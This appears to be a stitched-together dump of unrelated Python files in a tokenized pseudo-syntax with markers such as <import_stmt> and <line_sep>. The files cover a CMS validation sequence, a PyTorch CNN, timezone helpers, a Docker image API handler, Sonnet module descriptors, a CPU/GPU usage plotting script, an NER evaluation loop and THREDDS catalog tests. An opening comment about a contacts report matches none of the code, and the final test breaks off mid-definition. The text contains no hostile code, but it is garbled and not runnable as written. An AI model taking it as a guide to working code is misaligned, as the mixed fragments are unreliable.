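# Running: python contacts_report.py contacts.tsv
# prints, for example:
#   email: ada@example.com -- Lovelace, Ada
#   email: alan@example.com -- Turing, Alan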
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>Validation.RecoEgamma.electronPostValidationSequenceMiniAOD_cff *<line_sep>egammaPostValidationMiniAOD=cms.Sequence(electronPostValidationSequenceMiniAOD)<line_sep>
<import_stmt>torch<import_stmt>torch.nn<as>nn<line_sep>__all__=['HelloWorld' 'helloworld']<class_stmt>HelloWorld(nn.Module)<block_start><def_stmt>__init__ self num_classes=10<block_start>super(HelloWorld self).__init__()<line_sep>self.features=nn.Sequential(nn.Conv2d(3 16 kernel_size=3 stride=1 padding=1 bias=<false>) nn.ReLU(inplace=<true>) nn.Conv2d(16 32 kernel_size=3 stride=1 padding=1 bias=<false>) nn.ReLU(inplace=<true>) nn.Conv2d(32 64 kernel_size=3 stride=1 padding=1 bias=<false>) nn.ReLU(inplace=<true>) nn.Conv2d(64 num_classes kernel_size=3 stride=1 padding=1 bias=<false>))<line_sep>self.avgpool=nn.AvgPool2d(32 32)<block_end><def_stmt>forward self x<block_start>x=self.features(x)<line_sep>x=self.avgpool(x)<line_sep>x=x.view(x.shape[0] -1)<line_sep><return>x<block_end><block_end><def_stmt>helloworld num_classes=10<block_start><return>HelloWorld(num_classes)<block_end>
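A minimal smoke test of the network above (assuming 32x32 RGB inputs, which is what the trailing AvgPool2d(32, 32) expects):

if __name__ == "__main__":
    net = helloworld(num_classes=10)
    out = net(torch.randn(2, 3, 32, 32))
    print(out.shape)  # torch.Size([2, 10])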
"""Provides helper functions related to datetime operations."""<import_from_stmt>datetime date datetime timedelta timezone<import_stmt>pandas<as>pd<import_stmt>pytz<import_from_stmt>chaos_genius.core.utils.constants SUPPORTED_TIMEZONES<import_from_stmt>chaos_genius.settings TIMEZONE<def_stmt>get_server_timezone <block_start>"""Get server timezone."""<line_sep><return>datetime.now(timezone.utc).astimezone().tzname()<block_end><def_stmt>get_rca_date_from_string date_value<block_start>"""Get RCA date from string."""<line_sep><return>datetime.strptime(date_value "%Y/%m/%d %H:%M:%S").date()<block_end><def_stmt>get_datetime_string_with_tz date_value hourly=<false><arrow>str<block_start>"""Get date string with timezone."""<if_stmt>hourly<block_start>main_str=date_value.strftime("%d %b %Y %H:%M")+f" ({TIMEZONE})"<block_end><else_stmt><block_start>main_str=date_value.strftime("%d %b %Y")+f" ({TIMEZONE})"<block_end><return>main_str<block_end><def_stmt>_get_tz_from_offset_str utc_offset_str# TODO: update code when tz implementation is complete <block_start>sign=-1<if>utc_offset_str[-6]<eq>"-"<else>1<line_sep>utc_offset_mins=int(utc_offset_str[-2:])<times>sign<line_sep>utc_offset_hrs=int(utc_offset_str[-5:-3])<times>sign<line_sep>utc_offset=timedelta(hours=utc_offset_hrs minutes=utc_offset_mins)<line_sep>timezones=pytz.all_timezones<for_stmt>tz_name timezones<block_start><try_stmt><block_start>tz=pytz.timezone(tz_name)<line_sep>tz_offset=tz._transition_info[-1][0]<if_stmt>utc_offset<eq>tz_offset<block_start><return>tz<block_end><block_end><except_stmt>AttributeError<block_start><pass><block_end><block_end><return>_get_tz_from_offset_str("GMT+00:00")<block_end><def_stmt>get_lastscan_string_with_tz datetime_value_str<arrow>str<block_start>"""Get last scan time in reporting timezone."""<line_sep>server_tz_offset=timezone(datetime.now().astimezone().utcoffset())<line_sep>datetime_value=pd.Timestamp(datetime.strptime(datetime_value_str "%Y-%m-%dT%H:%M:%S.%f")).tz_localize(tz=server_tz_offset)<line_sep># TODO : Deprecate SUPPORTED_TIMEZONES over releases. <if_stmt>TIMEZONE<in>SUPPORTED_TIMEZONES<block_start>timezone_info=_get_tz_from_offset_str(SUPPORTED_TIMEZONES[TIMEZONE])<block_end><else_stmt><block_start>timezone_info=TIMEZONE<block_end>datetime_value=datetime_value.tz_convert(tz=timezone_info)<line_sep>main_str=datetime_value.strftime("%d %b %Y %H:%M")+f" ({TIMEZONE})"<line_sep><return>main_str<block_end><def_stmt>convert_datetime_to_timestamp date_value<arrow>int<block_start>"""Convert datetime to timestamp."""<if_stmt>isinstance(date_value date)<block_start>date_value=datetime(year=date_value.year month=date_value.month day=date_value.day)<block_end><return>int(date_value.timestamp())<times>1000<block_end>
<import_from_stmt>armada_backend api_base docker_client<import_from_stmt>armada_command.docker_utils.images LocalArmadaImage<import_from_stmt>armada_command.scripts.compat json<class_stmt>Images(api_base.ApiCommand)<block_start><def_stmt>on_get self req resp image_name_or_address image_name=<none><block_start><if_stmt>image_name<is><none><block_start>dockyard_address=<none><line_sep>image_name=image_name_or_address<block_end><else_stmt><block_start>dockyard_address=image_name_or_address<block_end>image=LocalArmadaImage(dockyard_address image_name)<try_stmt><block_start>docker_api=docker_client.api()<line_sep>image_info=json.dumps(docker_api.images(image.image_path))<line_sep><return>self.status_ok(resp {'image_info':'{image_info}'.format(**locals())})<block_end><except_stmt>Exception<as>e<block_start><return>self.status_exception(resp "Cannot get info about image." e)<block_end><block_end><block_end>
# Copyright 2019 The Sonnet Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Module descriptors programatically describe how to use modules."""<import_stmt>collections<import_from_stmt>typing Callable Union<import_stmt>sonnet<as>snt<import_stmt>tensorflow<as>tf<class_stmt>Wrapped(snt.Module)<block_start>@snt.no_name_scope<def_stmt>__init__ self wrapped:snt.Module<block_start>super().__init__()<line_sep>self.wrapped=wrapped<block_end><block_end><class_stmt>Training(Wrapped)<block_start>@snt.no_name_scope<def_stmt>__call__ self x:tf.Tensor<block_start><return>self.wrapped(x is_training=<true>)<block_end><block_end><class_stmt>Recurrent(Wrapped)<block_start>"""Unrolls a recurrent module."""<def_stmt>__init__ self module:Union[snt.RNNCore snt.UnrolledRNN] unroller=<none><block_start>super().__init__(module)<line_sep>self.unroller=unroller<block_end>@snt.no_name_scope<def_stmt>__call__ self x:tf.Tensor<block_start>initial_state=self.wrapped.initial_state(batch_size=tf.shape(x)[0])<if_stmt>isinstance(self.wrapped snt.UnrolledRNN)<block_start><assert_stmt>self.unroller<is><none><line_sep># The module expects TB...-shaped input as opposed to BT... x=tf.transpose(x [1 0]+list(range(2 x.shape.rank)))<line_sep><return>self.wrapped(x initial_state)<block_end><else_stmt><block_start>x=tf.expand_dims(x axis=0)<line_sep><return>self.unroller(self.wrapped x initial_state)<block_end><block_end><block_end><def_stmt>unwrap module:snt.Module<arrow>snt.Module<block_start><while_stmt>isinstance(module Wrapped)<block_start>module=module.wrapped<block_end><return>module<block_end># TODO(tomhennigan) De-duplicate this, BATCH_MODULES and goldens.py. 
ModuleDescriptor=collections.namedtuple("ModuleDescriptor" ["name" "create" "shape" "dtype"])<line_sep>ModuleDescriptor.__new__.__defaults__=(<none> <none> <none> tf.float32)<line_sep>BATCH_SIZE=8<line_sep># pylint: disable=unnecessary-lambda BATCH_MODULES=(ModuleDescriptor(name="BatchNorm" create=<lambda>:Training(snt.BatchNorm(<true> <true>)) shape=(BATCH_SIZE 2 2 3)) ModuleDescriptor(name="Bias" create=<lambda>:snt.Bias() shape=(BATCH_SIZE 3 3 3)) ModuleDescriptor(name="Conv1D" create=<lambda>:snt.Conv1D(3 3) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="Conv1DTranspose" create=<lambda>:snt.Conv1DTranspose(3 3) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="Conv2D" create=<lambda>:snt.Conv2D(3 3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Conv2DTranspose" create=<lambda>:snt.Conv2DTranspose(3 3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Conv3D" create=<lambda>:snt.Conv3D(3 3) shape=(BATCH_SIZE 2 2 2 2)) ModuleDescriptor(name="Conv3DTranspose" create=<lambda>:snt.Conv3DTranspose(3 3) shape=(BATCH_SIZE 2 2 2 2)) ModuleDescriptor(name="CrossReplicaBatchNorm" create=<lambda>:Training(snt.distribute.CrossReplicaBatchNorm(# pylint: disable=g-long-lambda <true> <true> snt.ExponentialMovingAverage(0.9) snt.ExponentialMovingAverage(0.9))) shape=(BATCH_SIZE 2 2 3)) ModuleDescriptor(name="DepthwiseConv2D" create=<lambda>:snt.DepthwiseConv2D(3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Dropout" create=<lambda>:Training(snt.Dropout(0.5)) shape=(BATCH_SIZE 3 3)) ModuleDescriptor(name="Embed" create=<lambda>:snt.Embed(10) shape=(BATCH_SIZE ) dtype=tf.int32) ModuleDescriptor(name="Flatten" create=<lambda>:snt.Flatten() shape=(BATCH_SIZE 3 3 3)) ModuleDescriptor(name="GroupNorm" create=<lambda>:snt.GroupNorm(2 <true> <true>) shape=(BATCH_SIZE 3 4)) ModuleDescriptor(name="InstanceNorm" create=<lambda>:snt.InstanceNorm(<true> <true>) shape=(BATCH_SIZE 3 2)) ModuleDescriptor(name="LayerNorm" create=<lambda>:snt.LayerNorm(1 <true> <true>) shape=(BATCH_SIZE 3 2)) ModuleDescriptor(name="Linear" create=<lambda>:snt.Linear(10) shape=(BATCH_SIZE 1)) ModuleDescriptor(name="Sequential" create=<lambda>:snt.Sequential([<lambda>x:x]) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="nets.VectorQuantizer" create=<lambda>:Training(snt.nets.VectorQuantizer(4 6 0.25)) shape=(BATCH_SIZE 3 4)) ModuleDescriptor(name="nets.VectorQuantizerEMA" create=<lambda>:Training(snt.nets.VectorQuantizerEMA(5 7 0.5 0.9)) shape=(BATCH_SIZE 5)) ModuleDescriptor(name="nets.Cifar10ConvNet" create=<lambda>:Training(snt.nets.Cifar10ConvNet()) shape=(BATCH_SIZE 3 3 2)) ModuleDescriptor(name="nets.ResNet50" create=<lambda>:Training(snt.nets.ResNet([1 1 1 1] 4)) shape=(BATCH_SIZE 3 3 2)) ModuleDescriptor(name="nets.MLP" create=<lambda>:snt.nets.MLP([3 4 5]) shape=(BATCH_SIZE 3)) )<line_sep>RNN_CORES=(ModuleDescriptor(name="Conv1DLSTM" create=<lambda>:snt.Conv1DLSTM((2 2) 3 3) shape=(BATCH_SIZE 2 2)) ModuleDescriptor(name="Conv2DLSTM" create=<lambda>:snt.Conv2DLSTM((2 2 2) 3 3) shape=(BATCH_SIZE 2 2 2)) ModuleDescriptor(name="Conv3DLSTM" create=<lambda>:snt.Conv3DLSTM((2 2 2 2) 3 3) shape=(BATCH_SIZE 2 2 2 2)) ModuleDescriptor(name="GRU" create=<lambda>:snt.GRU(1) shape=(BATCH_SIZE 128)) ModuleDescriptor(name="LSTM" create=<lambda>:snt.LSTM(1) shape=(BATCH_SIZE 128)) ModuleDescriptor(name="VanillaRNN" create=<lambda>:snt.VanillaRNN(8) shape=(BATCH_SIZE 128)) )<line_sep>UNROLLED_RNN_CORES=(ModuleDescriptor(name="UnrolledLSTM" create=<lambda>:snt.UnrolledLSTM(1) shape=(BATCH_SIZE 1 128)) )<def_stmt>recurrent_factory 
create_core:Callable[[] snt.RNNCore] unroller <arrow>Callable[[] Recurrent]<block_start><return><lambda>:Recurrent(create_core() unroller)<block_end><def_stmt>unroll_descriptors descriptors unroller=<none><block_start>"""Returns `Recurrent` wrapped descriptors with the given unroller applied."""<line_sep>out=[]<for_stmt>name,create,shape,dtype descriptors<block_start><if_stmt>unroller<is><none><block_start>name="Recurrent({})".format(name)<block_end><else_stmt><block_start>name="Recurrent({}, {})".format(name unroller.__name__)<block_end>out.append(ModuleDescriptor(name=name create=recurrent_factory(create unroller) shape=shape dtype=dtype))<block_end><return>tuple(out)<block_end>RECURRENT_MODULES=(unroll_descriptors(RNN_CORES snt.dynamic_unroll)+unroll_descriptors(RNN_CORES snt.static_unroll)+unroll_descriptors(UNROLLED_RNN_CORES))<line_sep>OPTIMIZER_MODULES=(ModuleDescriptor(name="optimizers.Adam" create=<lambda>:snt.optimizers.Adam(learning_rate=0.1)) ModuleDescriptor(name="optimizers.Momentum" create=<lambda>:snt.optimizers.Momentum(learning_rate=0.1 momentum=.9)) ModuleDescriptor(name="optimizers.RMSProp" create=<lambda>:snt.optimizers.RMSProp(learning_rate=0.1)) ModuleDescriptor(name="optimizers.SGD" create=<lambda>:snt.optimizers.SGD(learning_rate=0.1)) )<line_sep>IGNORED_MODULES={# Stateless or abstract. snt.BatchApply snt.Deferred snt.Module snt.Optimizer snt.Reshape # Metrics. snt.ExponentialMovingAverage snt.Mean snt.Metric snt.Sum # Normalization. snt.BaseBatchNorm # Tested via `snt.BatchNorm`. # Recurrent. snt.DeepRNN snt.RNNCore snt.TrainableState snt.UnrolledRNN # Tested via `snt.nets.ResNet`. snt.nets.ResNet50 snt.nets.resnet.BottleNeckBlockV1 snt.nets.resnet.BottleNeckBlockV2 snt.nets.resnet.BlockGroup }<line_sep>
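A small sketch (not from the original file) of how these descriptors are typically consumed, for example in parameterized tests: build each module from its factory and run it on a zero-filled input of the declared shape.

for descriptor in BATCH_MODULES[:2]:
    module = descriptor.create()
    out = module(tf.zeros(descriptor.shape, dtype=descriptor.dtype))
    print(descriptor.name, out.shape)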
# /* Copyright (C) 2016 Ion Torrent Systems, Inc. All Rights Reserved */ <import_stmt>pandas<as>pd<import_stmt>datetime<import_stmt>dateutil<import_stmt>matplotlib.dates<as>dates<import_from_stmt>matplotlib pyplot<as>plt<import_stmt>numpy<as>np<import_from_stmt>time strptime<import_stmt>os<line_sep># put the date on the same line with the cpu data os.system("awk 'NR%2{printf \"%s \",$0;next;}1' cpu_util.log > cpu_data.log")<line_sep>df=pd.read_csv("cpu_data.log" names=["dow" "mon" "day" "time" "tz" "year" "lcpu" "us" "lus" "sy" "lsy" "ni" "lni" "id" "lid" "wa" "lwa" "hi" "lhi" "si" "lsi" "st" "lst" ] delim_whitespace=<true> header=<none> )<line_sep>data=list(df.T.to_dict().values())# export the data frame to a python dictionary x_axis=np.zeros(len(data) dtype="datetime64[s]")<line_sep>y_axis_idle=np.zeros(len(data))<line_sep>y_axis_idle_smoothed=np.zeros(len(data))<line_sep>y_axis_usr=np.zeros(len(data))<line_sep>y_axis_usr_smoothed=np.zeros(len(data))<line_sep>y_axis_nice=np.zeros(len(data))<line_sep>y_axis_nice_smoothed=np.zeros(len(data))<line_sep>y_axis_sys=np.zeros(len(data))<line_sep>y_axis_sys_smoothed=np.zeros(len(data))<line_sep>span=5<line_sep>span_gpu=10<for_stmt>key range(0 len(data))<block_start>month=str(strptime(data[key]["mon"] "%b").tm_mon).zfill(2)<line_sep>datekey=(str(data[key]["year"])+"-"+month+"-"+str(data[key]["day"])+"T"+data[key]["time"])<line_sep>x_axis[key]=np.datetime64(datekey)<line_sep>y_axis_idle[key]=int(data[key]["id"])<line_sep>y_axis_usr[key]=int(data[key]["us"])<line_sep>y_axis_nice[key]=int(data[key]["ni"])<line_sep>y_axis_sys[key]=int(data[key]["sy"])<block_end># now, read in the gpu data df=pd.read_csv("gpu_util.log" names=["systemtime" "percent"] sep="," parse_dates=[0])<line_sep># or:, infer_datetime_format=True) data2=list(df.T.to_dict().values())# export the data frame to a python dictionary x_axis_gpu=np.zeros(len(data2) dtype="datetime64[s]")<line_sep>y_axis_gpu=np.zeros(len(data))<line_sep>y_axis_gpu_smoothed=np.zeros(len(data))<for_stmt>key range(0 len(data))<block_start>x_axis_gpu[key]=np.datetime64((data2[key]["systemtime"]))<if_stmt>key<l>len(data2)<block_start>y_axis_gpu[key]=int((data2[key]["percent"].replace(" " "").replace("%" "")))<block_end><else_stmt><block_start>y_axis_gpu[key]=0<block_end><block_end># print x_axis[0] # print x_axis_gpu[0] # print x_axis[len(x_axis)-1] # print x_axis_gpu[len(x_axis_gpu)-1] # smooth the data <if_stmt>len(data)<g>span<block_start><for_stmt>key range(span len(data)-span)<block_start>sum_gpu=0<for_stmt>key2 range(key-span key+span)<block_start>sum_gpu<augadd>y_axis_gpu[key2]<block_end>y_axis_gpu_smoothed[key]=sum_gpu/(2<times>span)<block_end><for_stmt>key range(span len(data)-span)<block_start>sum_idle=sum_usr=sum_nice=sum_sys=0<for_stmt>key2 range(key-span key+span)<block_start>sum_idle<augadd>y_axis_idle[key2]<line_sep>sum_usr<augadd>y_axis_usr[key2]<line_sep>sum_nice<augadd>y_axis_nice[key2]<line_sep>sum_sys<augadd>y_axis_sys[key2]<block_end>y_axis_idle_smoothed[key]=sum_idle/(2<times>span)<line_sep>y_axis_usr_smoothed[key]=sum_usr/(2<times>span)<line_sep>y_axis_nice_smoothed[key]=sum_nice/(2<times>span)<line_sep>y_axis_sys_smoothed[key]=sum_sys/(2<times>span)<block_end><block_end>s=data<line_sep>wl=0.6<line_sep>fsz=8<line_sep>fig=plt.figure(figsize=(15 5))<line_sep>ax=plt.subplot(111)<line_sep>box=ax.get_position()<line_sep>ax.set_position([box.x0 box.y0 box.width<times>0.85 box.height])<for_stmt>item ax.get_xticklabels()+ax.get_yticklabels()<block_start>item.set_fontsize(fsz)<block_end># xstart, 
xend = ax.get_xlim() # xtickvals = # ax.xaxis.set_ticks(xtickvals) plt.plot(x_axis y_axis_usr "#be4b48" linewidth=wl label="% usr")<line_sep>plt.plot(x_axis y_axis_nice "#98b954" linewidth=wl label="% nice")<line_sep>plt.plot(x_axis y_axis_sys "#7d60a0" linewidth=wl label="% sys")<line_sep>plt.plot(x_axis y_axis_idle "#46aac5" linewidth=wl label="% idle")<line_sep>plt.plot(x_axis y_axis_gpu "#000000" linewidth=wl label="% gpu")<line_sep>plt.legend(loc="right" bbox_to_anchor=(1.25 0.5) fontsize=fsz)<line_sep>plt.savefig("oiaTimingRaw.png")<line_sep>plt.clf()<line_sep>wl=1.0<line_sep>ax=plt.subplot(111)<line_sep>box=ax.get_position()<line_sep>ax.set_position([box.x0 box.y0 box.width<times>0.85 box.height])<for_stmt>item ax.get_xticklabels()+ax.get_yticklabels()<block_start>item.set_fontsize(fsz)<block_end>plt.plot(x_axis y_axis_usr_smoothed "#be4b48" linewidth=wl label="% usr")<line_sep>plt.plot(x_axis y_axis_nice_smoothed "#98b954" linewidth=wl label="% nice")<line_sep>plt.plot(x_axis y_axis_sys_smoothed "#7d60a0" linewidth=wl label="% sys")<line_sep>plt.plot(x_axis y_axis_idle_smoothed "#46aac5" linewidth=wl label="% idle")<line_sep>plt.plot(x_axis y_axis_gpu_smoothed "#000000" linewidth=0.4 label="% gpu")<line_sep>plt.legend(loc="right" bbox_to_anchor=(1.25 0.5) fontsize=fsz)<line_sep>plt.savefig("oiaTiming.png")<line_sep>os.remove("cpu_data.log")<line_sep>
# -*- coding: utf-8 -*- <import_stmt>torch<import_from_stmt>model LatticeLSTM<import_from_stmt>load_data char2idx idx2char label2idx idx2label word2idx data_generator<line_sep>character_size=len(char2idx)<line_sep>word_size=len(word2idx)<line_sep>embed_dim=300<line_sep>hidden_dim=128<line_sep>TEST_DATA_PATH="./data/test_data"# 测试数据 device="cuda"<if>torch.cuda.is_available()<else>'cpu'<line_sep>model=LatticeLSTM(character_size word_size label2idx embed_dim hidden_dim).to(device)<line_sep>model.load_state_dict(torch.load("./saved_model/model_lattice.pth" map_location=device))<line_sep>model.eval()<def_stmt>extract chars tags<block_start>result=[]<line_sep>pre=''<line_sep>w=[]<for_stmt>idx,tag enumerate(tags)<block_start><if_stmt><not>pre<block_start><if_stmt>tag.startswith('B')<block_start>pre=tag.split('-')[1]<line_sep>w.append(chars[idx])<block_end><block_end><else_stmt><block_start><if_stmt>tag<eq>f'I-{pre}'<block_start>w.append(chars[idx])<block_end><else_stmt><block_start>result.append([w pre])<line_sep>w=[]<line_sep>pre=''<if_stmt>tag.startswith('B')<block_start>pre=tag.split('-')[1]<line_sep>w.append(chars[idx])<block_end><block_end><block_end><block_end><return>[[''.join(x[0]) x[1]]<for>x result]<block_end>gold_num=0<line_sep>predict_num=0<line_sep>correct_num=0<for_stmt>sent,input_ids,input_words,labels_idx data_generator(TEST_DATA_PATH char2idx word2idx label2idx)<block_start>print(f"Sent: {sent}")<line_sep>chars=[idx2char[ix]<for>ix input_ids]<line_sep>labels=[idx2label[ix]<for>ix labels_idx]<line_sep>entities=extract(chars labels)<line_sep>gold_num<augadd>len(entities)<line_sep>print(f'NER: {entities}')<line_sep>res=model(input_ids input_words)<line_sep>pred_labels=[idx2label[ix]<for>ix res[1]]<line_sep>pred_entities=extract(chars pred_labels)<line_sep>predict_num<augadd>len(pred_entities)<line_sep>print(f'Predicted NER: {pred_entities}')<line_sep>print('---------------\n')<for_stmt>pred pred_entities<block_start><if_stmt>pred<in>entities<block_start>correct_num<augadd>1<block_end><block_end><block_end>print(f'gold_num = {gold_num}')<line_sep>print(f'predict_num = {predict_num}')<line_sep>print(f'correct_num = {correct_num}')<line_sep>precision=correct_num/predict_num<line_sep>print(f'precision = {precision}')<line_sep>recall=correct_num/gold_num<line_sep>print(f'recall = {recall}')<line_sep>print(f'f1-score = {2<times>precision<times>recall/(precision+recall)}')<line_sep>
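An illustrative check of extract() on made-up characters and tags; the trailing "O" matters because an entity is appended only once a following tag closes it.

chars = list("张三在北京。")
tags = ["B-PER", "I-PER", "O", "B-LOC", "I-LOC", "O"]
print(extract(chars, tags))  # [['张三', 'PER'], ['北京', 'LOC']]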
# Copyright (c) 2013-2019 Siphon Contributors. # Distributed under the terms of the BSD 3-Clause License. # SPDX-License-Identifier: BSD-3-Clause """Test the catalog access API."""<import_from_stmt>datetime datetime<import_stmt>logging<import_stmt>pytest<import_from_stmt>siphon.catalog get_latest_access_url TDSCatalog<import_from_stmt>siphon.testing get_recorder<line_sep>log=logging.getLogger('siphon.catalog')<line_sep>log.setLevel(logging.WARNING)<line_sep>recorder=get_recorder(__file__)<line_sep>@recorder.use_cassette('thredds-test-toplevel-catalog')<def_stmt>test_basic <block_start>"""Test of parsing a basic catalog."""<line_sep>url='http://thredds-test.unidata.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>'Forecast Model Data'<in>cat.catalog_refs<block_end>@recorder.use_cassette('thredds-test-toplevel-catalog')<def_stmt>test_catalog_representation <block_start>"""Test string representation of the catalog object."""<line_sep>url='http://thredds-test.unidata.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat)<eq>'Unidata THREDDS Data Server'<block_end>@recorder.use_cassette('thredds-test-toplevel-catalog')<def_stmt>test_catalog_session <block_start>"""Test of catalog session."""<line_sep>url='http://thredds-test.unidata.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>'Forecast Model Data'<in>cat.catalog_refs<line_sep># nothing is returned from the session close nor can you check it # but the ability to close is what is desired cat.session.close()<block_end>@recorder.use_cassette('thredds-test-latest-gfs-0p5')<def_stmt>test_access <block_start>"""Test catalog parsing of access methods."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/grib/'<concat>'NCEP/GFS/Global_0p5deg/latest.xml')<line_sep>cat=TDSCatalog(url)<line_sep>ds=list(cat.datasets.values())[0]<assert_stmt>'OPENDAP'<in>ds.access_urls<block_end>@recorder.use_cassette('thredds-test-default-5-0')<def_stmt>test_access_default_catalog <block_start>"""Test case-insensitive parsing of access methods in default catalog."""<line_sep>url=('http://localhost:8081/thredds/catalog/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>ds=list(cat.datasets.values())[0]<assert_stmt>'OPENDAP'<in>ds.access_urls<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_virtual_access <block_start>"""Test access of virtual datasets."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep># find the 2D time coordinate "full collection" dataset <for_stmt>dataset list(cat.datasets.values())<block_start><if_stmt>'Full Collection'<in>dataset.name<block_start>ds=dataset<line_sep><break><block_end><block_end><assert_stmt>'OPENDAP'<in>ds.access_urls<line_sep># TwoD is a virtual dataset, so HTTPServer # should not be listed here <assert_stmt>'HTTPServer'<not><in>ds.access_urls<block_end>@recorder.use_cassette('latest_rap_catalog')<def_stmt>test_get_latest <block_start>"""Test latest dataset helper function."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/'<concat>'grib/NCEP/RAP/CONUS_13km/catalog.xml')<line_sep>latest_url=get_latest_access_url(url 'OPENDAP')<assert_stmt>latest_url<block_end>@recorder.use_cassette('latest_rap_catalog')<def_stmt>test_latest_attribute <block_start>"""Test using the catalog latest 
attribute."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/'<concat>'grib/NCEP/RAP/CONUS_13km/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>cat.latest.name<eq>'RR_CONUS_13km_20150527_0100.grib2'<block_end>@recorder.use_cassette('top_level_cat')<def_stmt>test_tds_top_catalog <block_start>"""Test parsing top-level catalog."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>cat<block_end>@recorder.use_cassette('radar_dataset_cat')<def_stmt>test_simple_radar_cat <block_start>"""Test parsing of radar server catalog."""<line_sep>url='http://thredds.ucar.edu/thredds/radarServer/nexrad/level2/IDD/dataset.xml'<line_sep>cat=TDSCatalog(url)<assert_stmt>cat<block_end>@recorder.use_cassette('point_feature_dataset_xml')<def_stmt>test_simple_point_feature_collection_xml <block_start>"""Test accessing point feature top-level catalog."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/nws/metar/ncdecoded/catalog.xml'<concat>'?dataset=nws/metar/ncdecoded/Metar_Station_Data_fc.cdmr')<line_sep>cat=TDSCatalog(url)<assert_stmt>cat<block_end>@recorder.use_cassette('html_then_xml_catalog')<def_stmt>test_html_link recwarn<block_start>"""Test that we fall-back when given an HTML catalog page."""<line_sep>url=('http://thredds-test.unidata.ucar.edu/thredds/catalog/'<concat>'grib/NCEP/RAP/CONUS_13km/catalog.html')<line_sep>TDSCatalog(url)<assert_stmt>'Changing'<in>str(recwarn.pop(UserWarning).message)<block_end>@recorder.use_cassette('follow_cat')<def_stmt>test_catalog_follow <block_start>"""Test catalog reference following."""<line_sep>url='http://thredds.ucar.edu/thredds/catalog.xml'<line_sep>ref_name='Forecast Model Data'<line_sep>cat=TDSCatalog(url).catalog_refs[ref_name].follow()<assert_stmt>cat<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_order <block_start>"""Test that we properly order datasets parsed from the catalog."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>list(cat.datasets)<eq>['Full Collection (Reference / Forecast Time) Dataset' 'Best NAM CONUS 20km Time Series' 'Latest Collection for NAM CONUS 20km']<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_get_by_index <block_start>"""Test that datasets can be accessed by index."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>cat.datasets[0].name<eq>'Full Collection (Reference / Forecast Time) Dataset'<assert_stmt>cat.datasets[1].name<eq>'Best NAM CONUS 20km Time Series'<assert_stmt>cat.datasets[2].name<eq>'Latest Collection for NAM CONUS 20km'<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_str <block_start>"""Test that datasets are printed as expected."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat.datasets)<eq>("['Full Collection (Reference / Forecast Time) Dataset', "<concat>"'Best NAM CONUS 20km Time Series', "<concat>"'Latest Collection for NAM CONUS 20km']")<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_sliced_str <block_start>"""Test that datasets are printed as expected when 
sliced."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<assert_stmt>str(cat.datasets[-2:])<eq>('[Best NAM CONUS 20km Time Series, '<concat>'Latest Collection for NAM CONUS 20km]')<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_nearest_time <block_start>"""Test getting dataset by time using filenames."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>nearest=cat.catalog_refs.filter_time_nearest(datetime(2015 5 28 17))<assert_stmt>nearest.title<eq>'NAM_CONUS_20km_noaaport_20150528_1800.grib1'<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_nearest_time_30 <block_start>"""Test getting dataset by time; check for a day in the 30s (#gh-173)."""<line_sep>url=('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/NAM/'<concat>'CONUS_20km/noaaport/catalog.xml')<line_sep>cat=TDSCatalog(url)<line_sep>nearest=cat.catalog_refs.filter_time_nearest(datetime(2015 5 30 11))<assert_stmt>nearest.title<eq>'NAM_CONUS_20km_noaaport_20150530_1200.grib1'<block_end>@recorder.use_cassette('top_level_20km_rap_catalog')<def_stmt>test_datasets_nearest_time_raises 